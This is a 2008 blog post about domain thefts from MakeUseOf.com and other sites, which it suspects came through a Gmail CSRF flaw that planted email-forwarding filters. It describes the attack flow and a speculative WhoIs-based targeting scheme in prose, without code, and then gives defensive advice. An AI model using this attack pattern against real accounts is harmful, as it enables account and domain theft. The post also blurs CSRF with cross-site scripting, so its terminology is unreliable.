Pages

Sunday, November 23, 2008

New GMail Exploit Or Old Cross-Site Scripting Vulnerability

Earlier this month MakeUseOf.com’s domain was stolen right out from underneath them, it was hijacked and moved to another registrar. On Friday they provided us with the details of how they think the would be thief took control of their domain and moved it to another host.

In their post titled "BREAKING: New Gmail Security Flaw. More Domains Get Stolen!", MakeUseOf.com said they suspect that the hacker used some hole in GMail to create filters which forwarded crucial emails to the thieves. Which then allowed them to access to their GoDaddy account (among other things) and move the domains.

In what appears to be two completely separate incidents, both Cucirca.com and YouMP3.org were hit by the same thief in the same exact manner. The owners of each site contacted MakeUseOf.com and confirmed that similar filters had been placed in their GMail accounts and their domains had been transferred. The details provided were identical down to the thief's email address.

The attacks don't seem to be the first however, in fact MakUseOf points out that the same thing happened to David Airey last year.

Last year a serious cross-site request forgery (CSRF) vulnerability was found in Gmail and allegedly fixed. Security researcher Petko Petkov provided details of the vulnerability on his blog, which was then confirmed and supposedly fixed by Google. However the three attacks above seem to mirror directly what Petkov's hijack did.

The victim visits a page while being logged into GMail. Upon execution, the page performs a multipart/form-data POST to one of the GMail interfaces and injects a filter into the victim’s filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forward them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.

So is the hijack that David Airey, MakeUseOf.com, Cucirca.com and YouMP3.org were hit by a new exploit or did Google neglect to fix the cross-site scripting vulnerability?

The fact is there really is no way to tell at this point. GMail seems to be one of the only common denominators on the user end. We do know for the CSRF exploit to affect their accounts they all had to either visit the same site or view the same email, something along those lines to be affected.

One thing that peaked my interest is that the CSRF exploit has been around for over a year and this is the first I've heard of anyone hijacking GMail accounts in this fashion. Now that is not to say it hasn't happened, it just happens that the guy finally hijacked someone that has put the information into the spot light. The CSRF exploit could be used to hijack anything and would be virtually undetectable until someone went looking so it is possible there have been many attacks that have gone un-noticed.

For the hijacker to use Petkov's CSRF exploit to target webmasters he essentially has to create a "perfect storm". He'd have to get the exploit to them in some fashion, probably via an email sent to their GMail accounts, remember they have to be logged in to those accounts for it to work. Those accounts would have to be associated in some way with the webmasters domains. Either the registrar of the domain would have to have that particular email address on file for the password retrieval, or the email associated would have to be forwarded through the affected GMail account, so it could then be forwarded out to the hijacker.

From what I see you are talking about a lot of variables that would have to go right for this to happen.

For this particular scenario to play out and be lucrative a hijacker (or team of hijackers) would more than likely have to go on a phishing expedition and targeted multiple webmasters that showed GMail addresses on their WhoIs. They would then have to email out several emails with the CSRF exploit code. It would have to be a "good" email that these webmasters would have wanted to open allowing the exploit to work and the filters to be placed.

Aibek over at MakeUseOf makes a pretty good observation of how this could work:

In my opinion the hack was carried out in the following way:

- 1. hacker has an automattic script that searches public WhoIS databases and finds people that have gmail email listed as a contact.- 2. the script further filters the results leaving only somewhat established sites.- 3. next he sends an email to the owner (or even leaves a comment on his blog) with a link to a site that targets Gmail bug.

Aibek

As of right now there is no verification that the hijacking was the result of a vulnerability in GMail. However the evidence is leaning that way. If you are concerned that you might be vulnerable there are a couple things you can do to combat this.

Check your GMail settings and make sure you aren't already compromised. Check fowarding options and filters to make sure you aren't forwarding information to unknown sites. Disable any options you aren't using such as IMAP, and POP.

I suggest using a private email address for your accounts. There should be no reason for your domains to be registered to your contact address or even filtered through that address. Use a personal email address from your ISP and keep that information private.

Use FireFox with the No-Script add-on should help to block cross-site scripting exploits.

Stay away from emails and sites you aren't sure of, you should never be opening suspicious emails anyways.

Update all your software. Since there was no proof this was a CSRF exploit its still possible it was malware, a virus or even a trojan. You need to keep all the AV software up to date, especially if your personal computer is also used for business.

Change your passwords often. Again since there is no confirmation how the hijackers got in it is possible that the accounts were cracked. The accounts weren't locked out so thats not likely but still possible.

**Update**Google has posted a response on the Google Online Security Blog stating there is no known vulnerability and this was a case of phishing. For more details please see our follow up post.